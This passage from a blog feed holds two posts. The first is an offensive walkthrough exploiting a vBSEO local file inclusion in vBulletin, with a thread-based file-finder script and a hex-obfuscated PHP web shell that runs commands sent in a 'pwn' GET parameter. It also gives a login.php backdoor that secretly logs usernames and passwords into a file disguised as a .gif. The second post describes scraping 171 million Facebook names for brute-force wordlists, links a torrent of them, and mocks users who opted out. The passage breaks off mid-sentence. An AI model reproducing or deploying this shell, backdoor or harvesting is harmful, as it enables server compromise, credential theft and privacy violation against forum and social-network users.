&lt;span class=&quot;kw3&quot;&gt;time&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;sleep&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt; &lt;span class=&quot;kw2&quot;&gt;KeyboardInterrupt&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] Could not create any threads. Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; sub_dir == &lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] No sub directories were found, quitting.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;for&lt;/span&gt; value &lt;span class=&quot;kw1&quot;&gt;in&lt;/span&gt; sub_dir&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;0&lt;/span&gt;:&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;try&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;thread&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;start_new_thread&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;findPhile,&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;newtarget,value&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;time&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;sleep&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt; &lt;span class=&quot;kw2&quot;&gt;KeyboardInterrupt&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] Could not create any threads. Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;sys&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;try&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Waiting for threads..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw3&quot;&gt;time&lt;/span&gt;.&lt;span class=&quot;me1&quot;&gt;sleep&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nu0&quot;&gt;60&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt; &lt;span class=&quot;kw2&quot;&gt;KeyboardInterrupt&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;Quitting..&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;except&lt;/span&gt;:&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;[!] Error&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;co1&quot;&gt;# Don&#39;t forget, that this script can be used for more than one thing.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;Hopefully our tool finds the attachment  directory, and scans through the subdirectories for our file as shown in  the screenshot below.&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/images/vbseo/LFI-tool-04-border.png&quot;&gt;&lt;img alt=&quot;Script in Action&quot; class=&quot;aligncenter&quot; height=&quot;362&quot; src=&quot;http://www.exploit-db.com/images/vbseo/LFI-tool-04-border.png&quot; title=&quot;Script in Action&quot; width=&quot;545&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;If we request the location of our file  in our web browser, then we’re shown a text version of our file. Lets  try to include that and see what happens:&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/images/vbseo/vbseo_lfi-phpinfo.png&quot;&gt;&lt;img alt=&quot;phpinfo&quot; class=&quot;aligncenter&quot; height=&quot;362&quot; src=&quot;http://www.exploit-db.com/images/vbseo/vbseo_lfi-phpinfo.png&quot; title=&quot;phpinfo&quot; width=&quot;545&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;As you can see, we were succesful.&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;Now, I don’t like to use those fancy C99  shells and such. In fact I prefer simple shells made or written by  myself. For this purpose I’ve written a web application which allows me  to create these, with different methods of input, encoding and even  functions to be called. In this case I choose a GET-request, the  system() php call, and “shellcode-style” encoding.&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/images/vbseo/haxxd00r.png&quot;&gt;&lt;img alt=&quot;haxxd00r&quot; class=&quot;aligncenter&quot; height=&quot;362&quot; src=&quot;http://www.exploit-db.com/images/vbseo/haxxd00r.png&quot; title=&quot;haxxd00r&quot; width=&quot;545&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;Which results in the following code:&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;codecolorer-container php twitlight&quot; style=&quot;overflow: auto; white-space: nowrap;&quot;&gt;&lt;div class=&quot;php codecolorer&quot;&gt;?php &lt;span class=&quot;kw3&quot;&gt;eval&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;&lt;span class=&quot;es2&quot;&gt;\x65&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x72&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x72&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x6f&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x72&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x5f&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x72&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x65&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x70&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x6f&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x72&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x74&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x69&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x6e&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x67&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x28&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x30&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x29&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x3b&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x65&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x63&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x68&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x6f&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x20&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x40&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x73&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x79&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x73&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x74&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x65&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x6d&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x28&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x24&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x5f&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x47&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x45&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x54&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x5b&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x22&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x70&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x77&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x6e&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x22&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x5d&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x29&lt;/span&gt;&lt;span class=&quot;es2&quot;&gt;\x3b&lt;/span&gt;&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt; ?&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;We upload this to our target and include  this file, and call a basic system function such as “ls -al” via the  “pwn” GET-request in this case, which is successful.&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://www.exploit-db.com/images/vbseo/vbseo_lfi-mini-shell.png&quot;&gt;&lt;img alt=&quot;Code Exec&quot; class=&quot;aligncenter&quot; height=&quot;362&quot; src=&quot;http://www.exploit-db.com/images/vbseo/vbseo_lfi-mini-shell.png&quot; title=&quot;Code Exec&quot; width=&quot;545&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;h2&gt;Post Exploitation&lt;/h2&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;At this point we can pretty much do  anything we would like to, such as dumping the database for no good  since all passwords are salted and will take pretty much forever to  crack. Another more serious and blackhat approach I experienced on my  own forum, is to alter the login.php file so that every time someone  logs in, the information is saved in a seemingly harmless file.&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;codecolorer-container php twitlight&quot; style=&quot;height: 300px; overflow: auto; white-space: nowrap;&quot;&gt;&lt;div class=&quot;php codecolorer&quot;&gt;?php&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;coMULTI&quot;&gt;/* This code was placed inside login.php&lt;br /&gt;
Look at the comments for further details.&lt;br /&gt;
*/&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;coMULTI&quot;&gt;/* 1) Fopen&lt;br /&gt;
Open a file named profilepic12_2.gif and append data to it. Disable any  errors this may cause in case of failure. The path defined is static.&lt;br /&gt;
( fopen($var, &quot;a&quot;); Explanation: Open for writing only; place the file  pointer at the end of the file. If the file does not exist, attempt to  create it. ) */&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;re0&quot;&gt;$fp&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;@&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;fopen&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st_h&quot;&gt;&#39;/homepages/xxx/xxxxxxxxxx/htdocs/xxxxxxxxxxxxxxxxx/customprofilepics/profilepic12_2.gif&#39;&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;a&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;coMULTI&quot;&gt;/* If the file was opened or created succesfully then. &amp;nbsp;*/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;kw1&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;re0&quot;&gt;$fp&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;br0&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;coMULTI&quot;&gt;/* Write the following Base64-encoded fields to the file on one line:&lt;br /&gt;
The current date, Username, Password, IP-Address, User-Agent and a New Line ( \n ).&lt;br /&gt;
This also has error reporting specificly disabled. Just in case. */&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;sy0&quot;&gt;@&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;fputs&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;re0&quot;&gt;$fp&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;kw3&quot;&gt;base64_encode&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;date&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;st0&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;|&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;re0&quot;&gt;$vbulletin&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;-&amp;amp;&lt;/span&gt;gt&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;GPC&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st_h&quot;&gt;&#39;vb_login_username&#39;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;|&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;re0&quot;&gt;$vbulletin&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;-&amp;amp;&lt;/span&gt;gt&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;GPC&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st_h&quot;&gt;&#39;vb_login_password&#39;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;|&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;re0&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st_h&quot;&gt;&#39;REMOTE_ADDR&#39;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;|&quot;&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;re0&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;st_h&quot;&gt;&#39;HTTP_USER_AGENT&#39;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;sy0&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;st0&quot;&gt;&quot;&lt;span class=&quot;es1&quot;&gt;\n&lt;/span&gt;&quot;&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;coMULTI&quot;&gt;/* Close the file, error reporting is specificly disabled too here. */&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;sy0&quot;&gt;@&lt;/span&gt;&lt;span class=&quot;kw3&quot;&gt;fclose&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;re0&quot;&gt;$fp&lt;/span&gt;&lt;span class=&quot;br0&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;sy0&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;br0&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;coMULTI&quot;&gt;/* End of the custom-coded backdoor. */&lt;/span&gt;&lt;br /&gt;
?&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;After a few days if the attack hasn’t  been detected, loads of user accounts will be located within this file,  which the attacker can use to his or her advantage.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Author [&amp;nbsp; MaXe ]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
References:&lt;br /&gt;
[1] &lt;a href=&quot;http://www.exploit-db.com/exploits/11526/&quot; target=&quot;_blank&quot; title=&quot;http://www.exploit-db.com/exploits/11526/&quot;&gt;vBSEO LFI Proof of Concept&lt;/a&gt;&lt;br /&gt;
[2] Static link to &lt;a href=&quot;http://www.exploit-db.com/images/vbseo/basic.py&quot; title=&quot;Basic_Script&quot;&gt;basic.py&lt;/a&gt;&lt;br /&gt;
[3] Static link to &lt;a href=&quot;http://www.exploit-db.com/images/vbseo/threading.py&quot; title=&quot;Threaded_Version&quot;&gt;threading.py&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/2857478616098318309/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/08/vbulletin-not-so-secure-anymore.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2857478616098318309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/2857478616098318309'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/08/vbulletin-not-so-secure-anymore.html' title='vBulletin – Not So Secure Anymore'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-4167536241629531163</id><published>2010-07-27T02:58:00.000-07:00</published><updated>2010-07-27T02:58:51.469-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><title type='text'>Return of the Facebook Snatchers</title><content type='html'>&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: silver; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 11px;&quot;&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt;Credits for this goes to www.skullsecurity.org/blog/&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;First and foremost: if you want to cut to the chase, just download the&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/fbdata.torrent&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;torrent&lt;/a&gt;. If you want the full story, please read on....&lt;/div&gt;&lt;h2 style=&quot;color: #989c50; font-family: &#39;Trebuchet MS&#39;,Verdana,sans-serif; font-size: 16px; font-weight: bold; margin: 0px; padding: 0px;&quot;&gt;Background&lt;/h2&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Way back when I worked at Symantec, my friend Nick wrote a blog that caused a little bit of trouble for us:&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.symantec.com/connect/blogs/attack-facebook-snatchers&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;Attack of the Facebook Snatchers&lt;/a&gt;. I was blog editor at the time, and I went through the usual sign off process and, eventually, published it. Facebook was none too happy, but we fought for it and, in the end, we got to leave the blog up in its original form.&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Why do I bring this up? Well last week&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://twitter.com/FSLabsAdvisor&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;@FSLabsAdvisor&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;wrote an interesting&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://twitter.com/FSLabsAdvisor/status/18442678378&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;Tweet&lt;/a&gt;: it turns out, by heading to&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://www.facebook.com/directory&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;https://www.facebook.com/directory&lt;/a&gt;, you can get a list of every searchable user on all of Facebook!&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;My first idea was simple: spider the lists, generate first-initial-last-name (and similar) lists, then hand them over to&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://twitter.com/ithilgore&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;@Ithilgore&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;to use in Nmap&#39;s awesome new bruteforce tool he&#39;s working on,&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://nmap.org/ncrack/&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;Ncrack&lt;/a&gt;.&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;But as I thought more about it, and talked to other people, I realized that this is a scary privacy issue. I can find the name of pretty much every person on Facebook. Facebook helpfully informs you that &quot;[a]nyone can opt out of appearing here by changing their Search privacy settings&quot; -- but that doesn&#39;t help much anymore considering I already have them all (and you will too, when you download the&lt;a href=&quot;http://www.blogger.com/blogdata/fbdata.torrent&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;torrent&lt;/a&gt;). Suckers!&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Once I have the name and URL of a user, I can view, by default, their picture, friends, information about them, and some other details. If the user has set their privacy higher, at the very least I can view their name and picture. So, if any searchable user has friends that are non-searchable, those friends just opted into being searched, like it or not! Oops :)&lt;/div&gt;&lt;h2 style=&quot;color: #989c50; font-family: &#39;Trebuchet MS&#39;,Verdana,sans-serif; font-size: 16px; font-weight: bold; margin: 0px; padding: 0px;&quot;&gt;The lists&lt;/h2&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Which brings me to the next topic: the list! I wrote a&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/facebook.rb&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;quick Ruby script&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;(which has since become a more involved&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/facebook.nse&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;Nmap Script&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;that I haven&#39;t used for harvesting yet) that I used to download the full directory. I should warn you that it isn&#39;t exactly the most user friendly interface -- I wrote it for myself, primarily, I&#39;m only linking to it for reference. I don&#39;t really suggest you try to recreate my spidering. It&#39;s a waste of several hundred gigs of bandwidth.&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;The results were spectacular.&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style=&quot;font-weight: bold; margin: 0px; padding: 0px;&quot;&gt;171 million&lt;/strong&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;names (&lt;strong style=&quot;font-weight: bold; margin: 0px; padding: 0px;&quot;&gt;100 million&lt;/strong&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;unique). My original plan was to use this list to generate a&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/facebook-f.last-withcount.txt.bz2&quot; style=&quot;color: #989c50; margin: 0px; padding: 